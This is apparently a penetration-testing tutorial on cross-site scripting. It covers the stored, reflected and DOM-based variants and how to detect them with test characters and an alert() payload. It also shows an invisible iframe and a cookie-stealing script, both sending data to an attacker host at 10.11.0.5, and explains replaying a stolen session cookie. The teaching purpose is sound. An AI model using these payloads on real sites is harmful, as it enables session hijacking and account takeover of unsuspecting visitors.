Well-designed web pages typically sanitize user inputs to remove dangerous characters or strings. Cross site scripting occurs when data is not sanitized and attackers are able to inject inputs that are subsequently displayed on the web page.

There are three variants of cross-site scripting:

• Stored - occurs when the injected payload is stored on the server. The payload is subsequently displayed to anyone who visits the page.

  • Affects all users of the site

  • Often found in forum software, especially in comments sections or product reviews

• Reflected - occurs when injected payloads are placed into the page content through a form or link. Reflected XSS only affects the person performing the action.

  • Only attacks the person submitting the request or viewing the link

  • Often occurs in search field and results, as well as anywhere user input is included in error messages

• DOM-Based - take place solely in a page's Document Object Model (DOM).

  • Occurs when a page's DOM is modified with user-controlled content

All three variants can result in session hijacking, redirects and script execution.

Detecting

Detection is accomplished through reviewing web pages for input fields and testing to determine if those fields accept unsanitized inputs. Commonly sanitized characters (useful for testing) include:

< > ' " { } ;

If the application does not remove these characters, it may be vulnerable to XSS.

Basic example

• We discover a web page that includes a form for users to provide feedback

• Posting a test message of hello " ; <> results in no filtering of the input

• We then use a basic payload like "<script>alert('xss')</script>"

• After submitting, we receive a popup

• Because this user feedback is written to a database, this is a stored xss vulnerability and all users that visit the page will receive the popup

Injecting content

A more malicious version of this attacks includes injecting invisible iframes into a victims browser.

<iframe SRC=”http://10.11.0.5/report” height= “0” width= “0”></iframe>

When the victim visits the infected page, their browser attempts to download the linked item and establishes a connection with the attacking machine (requires a netcat listener on port 80)

Stealing cookies and session information

Cross site scripting can also be used to steal cookies and session information from site visitors.

<script> new Image().src=”http://10.11.0.5/cool.jpg?output=”+document.cookie; </script>

When a victim visits the page, their browser established a connection back to the attacking machine with an authenticated session id (listener required)

Once we have the session id, we can set it in our browser using a tool like Cookie-Editor, and browse to the page without providing credentials (assuming the cookie we captured was for an authenticated user).